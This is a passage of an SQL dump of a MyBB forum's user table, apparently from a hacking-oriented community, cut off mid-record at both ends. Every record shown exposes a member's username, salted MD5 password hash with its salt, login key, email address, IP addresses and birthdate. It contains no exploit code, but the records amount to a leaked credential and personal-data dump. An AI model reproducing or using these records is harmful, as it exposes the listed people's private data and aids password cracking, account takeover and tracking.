'0', '', '1349764217', '1350164687', '1350164687', '1350091295', '', '0', '', '', '', '1-1-1990', 'all', '[align=center][img]http://i.imgur.com/TKoUM.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '10', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '121.215.220.45', '124.187.6.178', '2044189741', '2092631730', '', '3117', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('243', 'Anarchy $ucks', 'bec807af55317fc6c9df7f9ac8f3520a', 'gtl4HLiN', 'MS4HJu7hsUCCvcM8Yb6MGolFnZitD7ABwcSlVtugTSoACX8cDi', '12234@gmail.com', '29', '', '', '', '7', '', '0', '', '1349443767', '1349733872', '1349733872', '0', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '108.171.103.234', '108.171.103.234', '1823172586', '1823172586', '', '7', '1', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '11', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('250', 'Theodore Bagwell', '106c6722bde84eccfc9a3200864a43c7', 'sZh8XV8P', '3XpNT3UZ7vRliA3lYNIECKY8QMYBDQL4JXB6jgQTKwD325kLMK', 'matthew2229@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349814285', '1350433718', '1349836505', '0', '', '0', '', '', '', '4-6-1986', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '24.61.32.100', '24.61.32.100', '406659172', '406659172', '', '2762', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('251', 'Banekitty', '7e8f1bb2be5bb4f9feaa62786f92c1ad', 'YCy5Ebs7', 'ZX8na74yU4InV6KA7lMQhdRxLbi5dqXsCtz53sje3U57hd6Jov', 'banekitty@nospam.ze.tc', '0', '', '', '', '14', '', '0', '', '1349923958', '1350525693', '1350525693', '0', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '177.142.119.28', '108.171.103.148', '-1316063460', '1823172500', '', '2781', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('252', 'k3h3d5', 'ad451e890f4645feae4f2d0a04c61619', 'glYjzzeO', 'YIRppxvoFnMuz5WmeLDebdDb5Du9TSNWCJLY5fT6JFhfFlUjZA', 'dons.juan@live.com', '1', './uploads/avatars/avatar_252.jpg?dateline=1349983314', '120|90', 'upload', '2', '', '0', '', '1349982291', '1350065894', '1350063838', '1349983084', '', '0', '', '', '', '16-7-1983', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '110.137.72.228', '180.251.249.167', '1854490852', '-1258554969', '', '3785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('253', 'GlowingCapes', '9527b72f1ae9d9318e0b142b7e3dad1c', 'FgvMq1wu', '27ociiH7goxaA1O7vMpHiajNh9zqnnMK2EHbk1VF3wKRXG2Pv8', 'skymd.duffeh@hotmail.com', '16', './uploads/avatars/avatar_253.png?dateline=1350036575', '100|100', 'upload', '2', '', '0', '', '1350035445', '1350439381', '1350174520', '1350438661', '', '0', '', '', '', '2-4-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '173.76.159.245', '173.76.159.245', '-1387487243', '-1387487243', '', '7108', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('255', 'sbhshroy2', 'a6c5bba434b57812a32abcc74064d620', 'w5NC1QmN', 'VI3P7nFieXmRFtWdk5JNd2ebazkhyZAXiDQTB9QV1HxSvzWuhe', 'sbhshroy2@gmail.com', '23', '', '', '', '9', '', '0', '', '1350099222', '1352373119', '1352135735', '1352024025', '', '0', '', '', '', '20-4-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '5.5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '27.62.200.63', '27.97.172.200', '457099327', '459386056', '', '15770', '1', '6', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:2:{s:4:\"acid\";a:2:{i:18;a:5:{s:4:\"acid\";i:18;s:4:\"name\";s:23:\"Advanced BH Contributor\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_23_54.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '10', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('254', 'Greed', 'd7de365b4910258830ac231c3c7f512a', '33hw1XdL', '6aMDqxRvYcqXcfV8WB76YvWphtrKKTzGhEwYNJeZ7aMzg6ysmG', 'ultimatevikingnipples@hotmail.com', '45', './uploads/avatars/avatar_254.png?dateline=1350058956', '120|76', 'upload', '14', '', '0', 'I Am Greed', '1350057258', '1350795518', '1350795518', '1350409520', '', '0', '', '', '', '21-10-1993', 'all', 'See, I\'m Greed. I want everything you can think of. Money and women, power and SEX. I want everything this world\'s selling and eternity\'s topping the list! [img]http://t3.gstatic.com/images?q=tbn:ANd9GcQqdkd2C5FurtyEleCFGwcIedVZ7LfOpmyqeDvcG4Yga1HcyLv90Br4ZAib[/img]', '1', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '1', '63.153.255.202', '63.153.255.202', '1067057098', '1067057098', '', '35342', '1', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '8', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('256', 'Andrew', '8bc54b10ea766dc4474b5998e623aa3f', 'Lfx2SzRg', 'dAEQp6zoRAgSW1wepjEkLhSzpEaQjPVuHgX2A8AtOEf8AlKHzs', 'drew-305@hotmail.com', '1', '', '', '', '2', '', '0', '', '1350102615', '1350137823', '1350135668', '1350102912', '', '0', '', '', '', '1-3-1994', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '232', '0', '0', '76.105.69.111', '76.105.69.111', '1281967471', '1281967471', '', '1111', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('257', 'XxTREYZxX', '1e10513003095e999b2d3633de492daa', 'kzLLEF4t', 'xS88CvB1ro6kzxHcIUTE3bFzNT83DjcYT7wJrlymldvuTc5JaD', 'treyz123456789@hotmail.com', '437', 'http://topminecraft.net/uploads/avatars/avatar_229.gif?dateline=1309773531?dateline=1351564570', '100|100', 'remote', '9', '17', '17', 'I WAS TREYZ', '1350111235', '1352782859', '1352768018', '1352767961', '', '0', '', '', '', '22-8-1998', 'all', '[img]http://media.tumblr.com/tumblr_m1ms9rztj21qbe1z0.gif[/img]', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-2', '0', '2', '82', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', 'hello peeps', '0', '5', '13', '203.104.11.2', '203.104.11.11', '-882373886', '-882373877', 'english', '272549', '1', '72', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:4:{s:4:\"acid\";a:21:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:4;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:5;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:6;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:8;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:9;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:10;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:11;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:12;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:14;a:1:{s:11:\"showpostbit\";i:0;}i:15;a:1:{s:11:\"showpostbit\";i:0;}i:16;a:1:{s:11:\"showpostbit\";i:0;}i:17;a:1:{s:11:\"showpostbit\";i:0;}i:18;a:1:{s:11:\"showpostbit\";i:0;}i:19;a:1:{s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showpostbit\";i:1;s:11:\"showprofile\";i:1;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}}}', '46', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('316', 'luc1f3r.n008', 'a0e740d20aa3ed7d5331e33cbd562056', 'Cp5KtdHq', 'P1vCLKI7wyekj4iH8isxG1XvzSWs37mAuDUIHK3cUgMaIWNdFl', 'luc1f3r.n008@gmail.com', '1', '', '', '', '2', '', '0', '', '1351963127', '1352018730', '1351965260', '1352018424', '', '0', '', '', '', '18-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '106.208.57.89', '106.206.163.177', '1792031065', '1791927217', '', '1247', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('258', 'PiXEL^OG', '874cc2f578ac785596a5976cf6644276', 'TMnePG2D', 'QyhlsxoRLeO946DqfETdGcV4ukIEutCFhGafWhPavkSX45XIeE', 'vemvillhadenna@hotmail.com', '71', './uploads/avatars/avatar_258.png?dateline=1350630690', '38|38', 'upload', '9', '', '0', 'FUCK THE POLICE', '1350115926', '1352817692', '1352715427', '1352526732', '', '0', '', '', '', '18-5-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '3', '139.190.235.246', '139.190.235.246', '-1950422026', '-1950422026', '', '63711', '1', '11', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"acid\";a:8:{i:15;a:5:{s:4:\"acid\";i:15;s:4:\"name\";s:12:\"Silver Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}}}', '4', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('259', 'MeowMeow', '5ce7218cc5a908f443a506e5c6cd0792', 'GjpR4xdN', 'fCZXNCl3j6tkr7wwcEcUn38SbQBNfNMU8iKxyrHS8iJC6kl89M', 'anonymousforeva@hotmail.co.uk', '2', '', '', '', '2', '', '0', '', '1350176549', '1351509401', '1350992368', '1350992367', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 